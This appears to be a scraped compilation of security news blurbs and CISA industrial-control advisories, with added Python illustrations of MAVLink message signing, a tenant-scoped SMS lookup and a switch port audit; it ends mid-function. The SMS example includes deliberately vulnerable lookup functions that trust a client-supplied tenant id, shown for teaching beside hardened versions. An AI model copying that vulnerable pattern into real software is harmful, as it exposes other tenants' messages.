Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

New CrystalRAT malware adds RAT, stealer and prankware features

A new malware-as-a-service called CrystalRAT is being promoted on Telegram, offering remote access, data theft, keylogging, and clipboard hijacking capabilities. [...]

Ransomware Will Hit Hospitals. Rehearsals Are Key to Defense

A chief medical information officer describes what hospitals face when they inevitably suffer a ransomware attack—whether it leads to short- or long-term outages.

Apple expands iOS 18 updates to more iPhones to block DarkSword attacks

Apple has now made it possible for more iPhones still running iOS 18 to receive security updates that protect against the actively exploited DarkSword exploit kit. [...]

LatAm's Self-Taught Cyber Talent Overlooked Amid Cyberattack Glut

A newly released study exclusively shared with Dark Reading details the unique circumstances that make up Latin America's labor pool, and why organizations may want to expand their talent search.

Cyberattacks Intensify Pressure on Latin American Governments

Cyber threats across Latin America are increasingly targeting government systems, from disruptive attacks in Puerto Rico to a surge of probes against Colombia’s health sector.

Venom Stealer MaaS Platform Commoditizes ClickFix Attacks

A new service on the cybercrime market provides automated capabilities to create persistent information-stealing social engineering attacks.

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-5281 Google Dawn Use-After-Free Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Are We Training AI Too Late?

Ask the Expert: Cybersecurity teams need to expand their field of view to include new, unique threat sources, rather than relying on past, proven threat actors.

Multiple Vulnerabilities in Apple Products Could Allow for Privilege Escalation

Multiple vulnerabilities have been discovered in Apple products, the most severe of which could allow for privilege escalation. Successful exploitation of the most severe of these vulnerabilities could allow a user to elevate privileges. Depending on the privileges associated with the user, they may be able to modify protected system files.

Axios NPM Package Compromised in Precision Attack

The NPM package for Axios, a popular JavaScript HTTP client library, was briefly compromised this week, possibly by North Korean threat actors.

Google's Vertex AI Is Over-Privileged. That's a Problem

Palo Alto Networks researchers show how attackers could exploit AI agents on Google's Vertex AI to steal data and break into restricted cloud infrastructure.

TeamPCP Breaches Cloud, SaaS Instances With Stolen Credentials

The threat group's shift to speedy attacks on AWS, Azure, and SaaS instances shows organizations need to respond quickly to compromised credentials.

AI and Quantum Are Forcing a Rethink of Digital Trust

In a conversation with Dark Reading’s Terry Sweeney, DigiCert CEO Amit Sinha explains how AI-driven identities and quantum threats are reshaping the foundations of digital trust.

Iran Deploys 'Pseudo-Ransomware,' Revives Pay2Key Operations

Iranian APTs are blurring the lines between state-sponsored and cybercriminal activities to target high-impact US organizations.

Anritsu Remote Spectrum Monitor

Summary

Successful exploitation of this vulnerability could allow attackers with network access to alter operational settings, obtain sensitive signal data, or disrupt device availability.

The following versions of Anritsu Remote Spectrum Monitor are affected:
- Remote Spectrum Monitor MS27100A vers:all/* (CVE-2026-3356)
- Remote Spectrum Monitor MS27101A vers:all/* (CVE-2026-3356)
- Remote Spectrum Monitor MS27102A vers:all/* (CVE-2026-3356)
- Remote Spectrum Monitor MS27103A vers:all/* (CVE-2026-3356)

CVSS v3: 9.8 | Vendor: Anritsu | Equipment: Anritsu Remote Spectrum Monitor | Vulnerabilities: Missing Authentication for Critical Function

Background

Critical Infrastructure Sectors: Communications, Defense Industrial Base, Emergency Services, Transportation Systems
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Japan

Vulnerabilities

CVE-2026-3356

The MS27102A Remote Spectrum Monitor is vulnerable to an authentication bypass that allows unauthorized users to access and manipulate its management interface. Because the device provides no mechanism to enable or configure authentication, the issue is inherent to its design rather than a deployment error.

Affected Products: Anritsu Remote Spectrum Monitor
Vendor: Anritsu
Product Version: Anritsu Remote Spectrum Monitor MS27100A: vers:all/*, Anritsu Remote Spectrum Monitor MS27101A: vers:all/*, Anritsu Remote Spectrum Monitor MS27102A: vers:all/*, Anritsu Remote Spectrum Monitor MS27103A: vers:all/*
Product Status: known_affected

Remediations:
- Mitigation: Anritsu has no plans to fix this issue. Anritsu recommends that users deploy Remote Spectrum Monitor within secure network environments to mitigate potential risks.
- Mitigation: Users can contact Anritsu Technical Support (1-800-267-4878) for more information.

Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS 3.1 base score 9.8 (CRITICAL), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Acknowledgments

Souvik Kandar reported this vulnerability to CISA.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History

Initial Release Date: 2026-03-31
- 2026-03-31, Revision 1: Initial Publication

PX4 Autopilot

Summary

Successful exploitation of this vulnerability could allow an attacker with access to the MAVLink interface to execute arbitrary shell commands without cryptographic authentication.

Affected versions of PX4 Autopilot:
PX4 Autopilot v1.16.0_SITL_latest_stable (CVE-2026-1579)

CVSS v3 9.8 | Vendor: PX4 | Equipment: PX4 Autopilot | Vulnerability: Missing Authentication for Critical Function

Background
Critical Infrastructure Sectors: Transportation Systems, Emergency Services, Defense Industrial Base
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerability: CVE-2026-1579
The MAVLink communication protocol does not require cryptographic authentication by default. When MAVLink 2.0 message signing is not enabled, any message, including SERIAL_CONTROL, which provides interactive shell access, can be sent by an unauthenticated party with access to the MAVLink interface. PX4 provides MAVLink 2.0 message signing as the cryptographic authentication mechanism for all MAVLink communication; when signing is enabled, unsigned messages are rejected at the protocol level.

In practice this is a configuration gap rather than a parser bug: shell access over SERIAL_CONTROL works as designed, and the only thing standing between a party on the telemetry link and a command shell on the autopilot is whether signing has been enabled on that link.

Relevant CWE: CWE-306 Missing Authentication for Critical Function
CVSS v3.1 base score 9.8 (CRITICAL), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Products
Vendor: PX4
Product: PX4 Autopilot v1.16.0_SITL_latest_stable (status: known_affected)

Remediations
PX4 recommends enabling MAVLink 2.0 message signing as the authentication mechanism for all non-USB communication links. PX4 has published a security hardening guide for integrators and manufacturers: https://docs.px4.io/main/en/mavlink/security_hardening
Message signing configuration documentation: https://docs.px4.io/main/en/mavlink/message_signing

Acknowledgments: Dolev Aviv of Cyviation reported this vulnerability to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage at cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-31
2026-03-31  Revision 1  Initial Publication
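The advisory's point is that with signing off, the receiver has no reason to drop a SERIAL_CONTROL frame from anyone. The block below is an added example, not PX4 or MAVLink project code: it builds MAVLink 2 frames, appends the 13-byte signature block the MAVLink 2 signing format defines (link id, 48-bit timestamp in 10 µs units, and the first 6 bytes of SHA-256 over secret key, frame including CRC, link id and timestamp), and implements the receiver-side policy a signing-enabled autopilot applies: unsigned, wrongly keyed, tampered and replayed frames are all rejected. The message id 126 and CRC_EXTRA 220 for SERIAL_CONTROL are taken from the common dialect and should be treated as assumptions if your dialect differs; the key and payload are constructed for the demo.

```python
"""Added example, not PX4 or MAVLink project code: a MAVLink 2 receiver that enforces message signing.

Frame layout (MAVLink 2): STX(0xFD) len incompat compat seq sysid compid msgid[3] payload crc[2],
followed, when incompat bit 0x01 is set, by link_id(1) timestamp(6) signature(6).
signature = first 6 bytes of SHA-256(secret_key || frame incl. CRC || link_id || timestamp)
"""
import hashlib
import hmac
import struct

MAVLINK_STX_V2 = 0xFD
IFLAG_SIGNED = 0x01                       # incompat_flags bit: signature block present
SIG_BLOCK_LEN = 13                        # link_id(1) + timestamp(6) + sha256_48(6)
MSG_ID_SERIAL_CONTROL = 126               # message id from the common dialect (assumption)
CRC_EXTRA = {MSG_ID_SERIAL_CONTROL: 220}  # per-message CRC seed, value assumed from the common dialect


def x25_crc(data: bytes, crc: int = 0xFFFF) -> int:
    """MAVLink's X.25 CRC-16 (CRC-16/MCRF4XX), seeded with 0xFFFF."""
    for byte in data:
        tmp = (byte ^ (crc & 0xFF)) & 0xFF
        tmp = (tmp ^ (tmp << 4)) & 0xFF
        crc = ((crc >> 8) ^ (tmp << 8) ^ (tmp << 3) ^ (tmp >> 4)) & 0xFFFF
    return crc


def build_frame(msgid: int, payload: bytes, seq: int, sysid: int, compid: int, signed: bool) -> bytes:
    """Header + payload + CRC. The CRC covers every byte after STX plus the message's CRC_EXTRA byte."""
    incompat = IFLAG_SIGNED if signed else 0
    header = struct.pack("<7B", MAVLINK_STX_V2, len(payload), incompat, 0, seq, sysid, compid)
    header += msgid.to_bytes(3, "little")
    crc = x25_crc(header[1:] + payload)
    crc = x25_crc(bytes([CRC_EXTRA[msgid]]), crc)
    return header + payload + struct.pack("<H", crc)


def sign_frame(frame: bytes, key: bytes, link_id: int, timestamp: int) -> bytes:
    """Append the signature block; timestamp is in 10 us units and must increase per link."""
    if len(key) != 32:
        raise ValueError("MAVLink signing keys are 32 bytes")
    ts = timestamp.to_bytes(6, "little")
    sig = hashlib.sha256(key + frame + bytes([link_id]) + ts).digest()[:6]
    return frame + bytes([link_id]) + ts + sig


class SigningReceiver:
    """Receiver policy with signing enabled: unsigned, forged, tampered or replayed frames are dropped."""

    def __init__(self, key: bytes):
        self.key = key
        self.last_ts: dict[tuple[int, int, int], int] = {}  # (sysid, compid, link_id) -> last timestamp

    def check(self, data: bytes) -> tuple[bool, str]:
        if len(data) < 12 or data[0] != MAVLINK_STX_V2:
            return False, "not a MAVLink 2 frame"
        plen, incompat = data[1], data[2]
        if not incompat & IFLAG_SIGNED:
            return False, "unsigned frame rejected"      # the CVE-2026-1579 condition, closed
        body_len = 10 + plen + 2
        if len(data) != body_len + SIG_BLOCK_LEN:
            return False, "bad length"
        frame, block = data[:body_len], data[body_len:]
        link_id, ts_bytes, sig = block[0], block[1:7], block[7:]
        expected = hashlib.sha256(self.key + frame + bytes([link_id]) + ts_bytes).digest()[:6]
        if not hmac.compare_digest(expected, sig):      # constant-time compare
            return False, "bad signature"
        msgid = int.from_bytes(frame[7:10], "little")
        crc = x25_crc(bytes([CRC_EXTRA.get(msgid, 0)]), x25_crc(frame[1:-2]))
        if crc != struct.unpack("<H", frame[-2:])[0]:
            return False, "bad crc"
        stream = (frame[5], frame[6], link_id)
        ts = int.from_bytes(ts_bytes, "little")
        if ts <= self.last_ts.get(stream, -1):           # replay protection per (sysid, compid, link)
            return False, "stale timestamp (replay)"
        self.last_ts[stream] = ts
        return True, "accepted"


def demo() -> dict:
    """Constructed scenario: one legitimate GCS, one party on the link without the key."""
    key = bytes(range(32))                     # constructed demo key; provision a random one in practice
    rx = SigningReceiver(key)
    payload = b"constructed SERIAL_CONTROL payload"      # placeholder, not a real SERIAL_CONTROL encoding
    unsigned = build_frame(MSG_ID_SERIAL_CONTROL, payload, 1, 1, 1, signed=False)
    body = build_frame(MSG_ID_SERIAL_CONTROL, payload, 2, 1, 1, signed=True)
    good = sign_frame(body, key, link_id=0, timestamp=1_000)
    forged = sign_frame(body, bytes(32), link_id=0, timestamp=1_001)   # wrong key
    tampered = bytearray(good)
    tampered[12] ^= 0x41                                               # flip a payload byte after signing
    return {
        "unsigned": rx.check(unsigned)[1],
        "good": rx.check(good)[1],
        "replay": rx.check(good)[1],
        "forged": rx.check(forged)[1],
        "tampered": rx.check(bytes(tampered))[1],
    }


if __name__ == "__main__":
    print(demo())
```

With signing disabled, the receiver has no "unsigned frame rejected" branch and the first frame in demo() would be parsed and acted on like any other; that is the whole distance between the default and the hardened configuration. Note that the timestamp check is per (sysid, compid, link_id) stream, so a captured frame cannot be replayed on the same link later.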

0
AI-Powered 'DeepLoad' Malware Steals Credentials, Evades Detection

The massive amount of junk code that hides the malware's logic from security scans was almost certainly generated by AI, researchers say.

0
F5 BIG-IP Vulnerability Reclassified as RCE, Under Exploitation

CVE-2025-53521 was initially disclosed in October as a high-severity denial-of-service (DoS) flaw, but new information has revealed the bug is actually much more dangerous.

0
Manufacturing & Healthcare Share Struggles with Passwords

The two key economic sectors struggle with security for a reason: Many insiders view access management as a roadblock, while attackers see it as a way in.

0
A Vulnerability in F5 Products Could Allow for Remote Code Execution

A vulnerability has been discovered in F5 products that could allow for remote code execution. F5 BIG-IP APM is an access policy management solution designed to enforce secure access to applications, APIs, and sensitive data. It is commonly deployed by enterprises, financial institutions, and government or public sector organizations to centrally control authentication, authorization, and user access across internal and remote environments. Successful exploitation of this vulnerability could lead to remote code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured with fewer rights on the system could be less impacted than those who operate with administrative user rights.

0
Multiple Vulnerabilities in NetScaler ADC and NetScaler Gateway Could Allow for Memory Overread

Multiple vulnerabilities have been discovered in NetScaler ADC and NetScaler Gateway, the most severe of which could allow for memory overread. NetScaler ADC is a networking product that functions as an Application Delivery Controller (ADC), a tool that optimizes, secures, and ensures the reliable availability of applications for businesses. NetScaler Gateway is a secure remote access solution that provides users with single sign-on (SSO) to applications and resources from any device, anywhere. Successful exploitation of these vulnerabilities could lead to memory overread of potentially sensitive data from the appliance's memory.

0
Storm Brews Over Critical, No-Click Telegram Flaw

The vulnerability, which is allegedly triggered by a corrupted sticker in the messaging app, received a 9.8 CVSS score, but Telegram denies it exists.

0
CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-3055 Citrix NetScaler Out-of-Bounds Read Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

0
China Upgrades the Backdoor It Uses to Spy on Telcos Globally

Chinese APT Red Menshen's super-advanced BPFdoor malware defeats traditional cybersecurity protections. All telcos can do, really, is try hunting it down.

0
Wartime Usage of Compromised IP Cameras Highlights Their Danger

The list of countries exploiting Internet-connected cameras to give them eyes inside their adversaries' borders continues to expand. What should companies look out for?

0
Infrastructure Attacks With Physical Consequences Down 25%

Operational technology (OT) at industrial and critical infrastructure sites seems to have been benefitting from a lull in ransomware, and from hackers' relative ignorance of OT systems.

0
CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2025-53521 F5 BIG-IP Remote Code Execution Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

0
Coruna, DarkSword & Democratizing Nation-State Exploit Kits

Nation-state malware is being sold on the Dark Web and leaked to GitHub; and ordinary organizations might not stand much of a chance of defending themselves.

0
Automotive Cybersecurity Threats Grow in Era of Connected, Autonomous Vehicles

More than a decade since the 2015 Jeep hack, the cybersecurity of vehicles remains of the utmost importance.

0
Critical Flaw in Langflow AI Platform Under Attack

Threat actors pounced on the code injection vulnerability within hours of its disclosure, demonstrating that organizations have little time to address critical bugs.

0
How Organizations Can Use Mistakes to Level Up Their Security Programs

Organizations repeatedly expose ports, reuse passwords, and skip patches, creating security gaps that attackers exploit for breaches. An industry veteran outlines ways to fix these common mistakes.

0
strongSwan CVE-2026-25075: Integer Underflow in VPN Authentication

Bishop Fox researchers took a deep dive into a new strongSwan vulnerability that allows unauthenticated attackers to take VPN services offline. We created an easy tool to test your strongSwan deployment & recommend upgrading to version 6.0.5 and later.

0
OpenCode Systems OC Messaging and USSD Gateway

Summary

Successful exploitation of this vulnerability could allow an authenticated low-privileged user to gain access to SMS messages outside of their authorized tenant scope via a crafted company or tenant identifier parameter.

Affected versions of OpenCode Systems OC Messaging and USSD Gateway:
OC Messaging 6.32.2 (CVE-2025-70614)
USSD Gateway 6.32.2 (CVE-2025-70614)

CVSS v3 8.1 | Vendor: OpenCode Systems | Equipment: OC Messaging and USSD Gateway | Vulnerability: Improper Access Control

Background
Critical Infrastructure Sectors: Communications
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Bulgaria

Vulnerability: CVE-2025-70614
OpenCode Systems Custom Messaging Gateway 6.32.2 contains a web access vulnerability allowing one authenticated user to gain access to another authenticated user's messages via a crafted identifier parameter.
Relevant CWE: CWE-284 Improper Access Control
CVSS v3.1 base score 8.1 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

The root-cause pattern is the familiar one behind broken object-level authorization: the tenant (or company) identifier is taken from the request and used to select data, without checking that it matches the tenant the caller's session was issued for. Authentication succeeds, so the gateway's logs will show an ordinary logged-in user; the anomaly to hunt for is a session reading identifiers other than its own.

Affected Products
Vendor: OpenCode Systems
Products: OC Messaging 6.32.2, USSD Gateway 6.32.2 (status: known_affected)

Remediations
The vulnerability was identified by OpenCode Systems on January 5, 2026 and remediated on January 6, 2026 with the release of version 6.33.11.
For more information, contact OpenCode: https://opencode.com/about/contact-us

Acknowledgments: Hussein Amer reported this vulnerability to CISA.

Legal Notice and Terms of Use: as for the advisories above (https://www.cisa.gov/notification, https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA's standard defensive measures for control systems apply; they are reproduced in full in the PX4 Autopilot advisory above (minimize network exposure, place control system networks behind firewalls and isolate them from business networks, use up-to-date VPNs for remote access, and guard against social engineering). Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-26
2026-03-26  Revision 1  Initial Publication
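To make the bug class concrete, here is an added example (my own illustration, not OpenCode Systems code, and not a description of their implementation) of a tenant-scoped SMS lookup in its vulnerable form beside a hardened one. The tenant names, message ids and texts are constructed sample data; the "company_id" parameter name is an assumption standing in for whatever crafted identifier the advisory refers to. The hardened functions derive authorization scope from the authenticated session, and treat foreign objects the same as missing ones so the endpoint cannot be used as an existence oracle.

```python
"""Added example, not OpenCode Systems code: tenant-scoped SMS lookup, vulnerable form beside the hardened one."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Message:
    msg_id: int
    tenant_id: str
    text: str


@dataclass(frozen=True)
class Session:
    user: str
    tenant_id: str                 # bound at login; the only trustworthy statement of scope
    is_platform_admin: bool = False


class NotFound(Exception):
    """Raised for missing and foreign objects alike, so the API does not reveal what exists."""


# Constructed sample store: two tenants sharing one gateway.
STORE = {
    101: Message(101, "acme", "OTP 118822"),
    102: Message(102, "acme", "delivery report ok"),
    201: Message(201, "globex", "OTP 994471"),
}


def list_messages_vulnerable(session: Session, company_id: str) -> list:
    """Authenticated, but the tenant scope comes from the request: any company_id is honoured."""
    return [m.text for m in STORE.values() if m.tenant_id == company_id]


def get_message_vulnerable(session: Session, msg_id: int) -> str:
    """Direct object reference with no ownership check: any id the caller can guess is readable."""
    return STORE[msg_id].text


def list_messages_hardened(session: Session, company_id: str) -> list:
    """Scope is the session's tenant; a mismatching request parameter is refused, not used."""
    if not session.is_platform_admin and company_id != session.tenant_id:
        raise NotFound(company_id)
    return [m.text for m in STORE.values() if m.tenant_id == company_id]


def get_message_hardened(session: Session, msg_id: int) -> str:
    """Fetch, then verify the object belongs to the caller's tenant before returning it."""
    msg = STORE.get(msg_id)
    if msg is None or (not session.is_platform_admin and msg.tenant_id != session.tenant_id):
        raise NotFound(msg_id)
    return msg.text


def demo() -> dict:
    """A low-privileged user of tenant 'acme' asks for tenant 'globex' data both ways."""
    alice = Session(user="alice", tenant_id="acme")
    out = {
        "list_vulnerable": list_messages_vulnerable(alice, "globex"),
        "get_vulnerable": get_message_vulnerable(alice, 201),
        "list_own": list_messages_hardened(alice, "acme"),
    }
    for name, call in (("list_hardened", lambda: list_messages_hardened(alice, "globex")),
                       ("get_hardened", lambda: get_message_hardened(alice, 201))):
        try:
            call()
            out[name] = "leaked"
        except NotFound:
            out[name] = "denied"
    return out


if __name__ == "__main__":
    print(demo())
```

Better still, drop the client-supplied tenant parameter altogether and query on session.tenant_id; the cross-check form is shown because an identifier parameter is the shape the affected endpoint has. Whichever form is used, the check has to run on every object access, not only on the listing call.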

0
WAGO GmbH & Co. KG Industrial Managed Switches

Summary

An unauthenticated remote attacker can exploit a hidden function in the CLI prompt to escape the restricted interface, leading to full compromise of the device.

Every affected product carries the same vulnerability, CVE-2026-3587. The advisory lists each hardware variant once as "firmware versions prior to VX.Y.Z.S0" and again as "firmware version VX.Y.Z.S0", which together mean "VX.Y.Z.S0 and earlier"; the table below folds those entries together and adds the fixed version WAGO gives for each variant.

Hardware            Product line               Affected firmware          Fixed firmware
852-1812            Lean Managed Switch        V1.2.1.S0 and earlier      V1.2.1.S1
852-1812/010-000    Lean Managed Switch        V1.2.1.S0 and earlier      V1.2.1.S1
852-1813            Lean Managed Switch        V1.2.1.S0 and earlier      V1.2.1.S1
852-1813/000-001    Lean Managed Switch        V1.2.3.S0 and earlier      V1.2.3.S1
852-1813/010-000    Lean Managed Switch        V1.2.1.S0 and earlier      V1.2.1.S1
852-1813/010-001    Lean Managed Switch        V1.2.1.S0, V1.2.1.S1       V1.2.1.S1 (see note)
852-1816            Lean Managed Switch        V1.2.1.S0 and earlier      V1.2.1.S1
852-1816/010-000    Lean Managed Switch        V1.2.1.S0 and earlier      V1.2.1.S1
852-303             Industrial Managed Switch  V1.2.8.S0 and earlier      V1.2.8.S1
852-602             Industrial Managed Switch  V1.0.6.S0 and earlier      V1.0.6.S1
852-603             Industrial Managed Switch  V1.0.6.S0 and earlier      V1.0.6.S1
852-1305            Industrial Managed Switch  V1.2.0.S0 and earlier      V1.2.0.S1
852-1305/000-001    Industrial Managed Switch  V1.2.0.S0 and earlier      V1.2.0.S1
852-1505            Industrial Managed Switch  V1.1.9.S0 and earlier      V1.1.9.S1
852-1505/000-001    Industrial Managed Switch  V1.2.0.S0 and earlier      V1.2.0.S1
852-1605            Industrial Managed Switch  V1.2.5.S0 and earlier      V1.2.5.S1

Note: for 852-1813/010-001 the advisory lists V1.2.1.S1 both as a known-affected version and as the fixed version. Confirm the correct target release against VDE-2026-020 before treating that variant as patched.

CVSS v3 10 | Vendor: WAGO | Equipment: WAGO GmbH & Co. KG Industrial Managed Switches | Vulnerability: Hidden Functionality

Background
Critical Infrastructure Sectors: Commercial Facilities, Critical Manufacturing, Energy, Transportation Systems
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerability: CVE-2026-3587
An unauthenticated remote attacker can exploit a hidden function in the CLI prompt to escape the restricted interface, leading to full compromise of the device.
Relevant CWE: CWE-912 Hidden Functionality
CVSS v3.1 base score 10 (CRITICAL), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Affected Products
Vendor: WAGO. Product status: known_affected for every hardware and firmware combination in the table above.

Remediations
WAGO has identified the following specific workarounds and mitigations users can apply to reduce risk:
- All listed products: update to the fixed firmware version given in the table above.
- Lean Managed Switches (852-1812, 852-1813, 852-1813/000-001, 852-1816, 852-1812/010-000, 852-1813/010-000, 852-1816/010-000, 852-1813/010-001): to eliminate the attack vector, deactivate ssh and telnet on the device.
- Industrial Managed Switches (852-303, 852-1305, 852-1305/000-001, 852-1505/000-001, 852-1505, 852-602, 852-603, 852-1605): to reduce the attack vector, deactivate ssh and telnet on the devices. This ensures that the CLI is only accessible locally via RS232.

The wording differs on purpose: on the Industrial Managed Switches the workaround only narrows exposure, because the hidden CLI function remains reachable through the RS232 console, so physical access to the serial port should be treated as device compromise until the fixed firmware is installed. The AV:N/PR:N vector means no credentials are involved; network reachability of the switch's ssh and telnet services is the whole exposure, and that is the thing to verify after applying the workaround.

For more information see the associated WAGO GmbH & Co. KG security advisory VDE-2026-020:
WAGO PSIRT: https://www.wago.com/de-en/automation-technology/psirt
VDE-2026-020 (HTML): https://certvde.com/en/advisories/VDE-2026-020
VDE-2026-020 (CSAF): https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-020.json

Acknowledgments: CERT@VDE coordination reported this vulnerability to CISA.

Legal Notice and Terms of Use: as for the advisories above (https://www.cisa.gov/notification, https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA's standard defensive measures for control systems apply; they are reproduced in full in the PX4 Autopilot advisory above (minimize network exposure, place control system networks behind firewalls and isolate them from business networks, use up-to-date VPNs for remote access, and guard against social engineering). Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-26
2026-03-26  Revision 1  Initial Republication of WAGO GmbH & Co. KG VDE-2026-020
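The workaround is only worth anything if ssh and telnet are actually closed on every switch, so the check to run after applying it is a connect probe against TCP/22 and TCP/23 on the management addresses. The block below is an added example of that check (my own code, not WAGO's or CISA's tooling); the management addresses in the commented-out call are assumed placeholders, and demo() substitutes a loopback listener for a switch with telnet still enabled so the block runs offline.

```python
"""Added example, not WAGO or CISA tooling: verify that ssh/telnet are really closed on managed switches."""
import socket
from concurrent.futures import ThreadPoolExecutor

# The two services the WAGO workaround says to deactivate.
REMOTE_CLI_PORTS = {22: "ssh", 23: "telnet"}


def port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """TCP connect probe: True when something is listening and completes the handshake."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0


def audit_remote_cli(hosts, ports=REMOTE_CLI_PORTS, timeout: float = 1.0) -> dict:
    """Map each host to the remote CLI services still reachable; an empty list means the workaround holds."""
    def probe(host):
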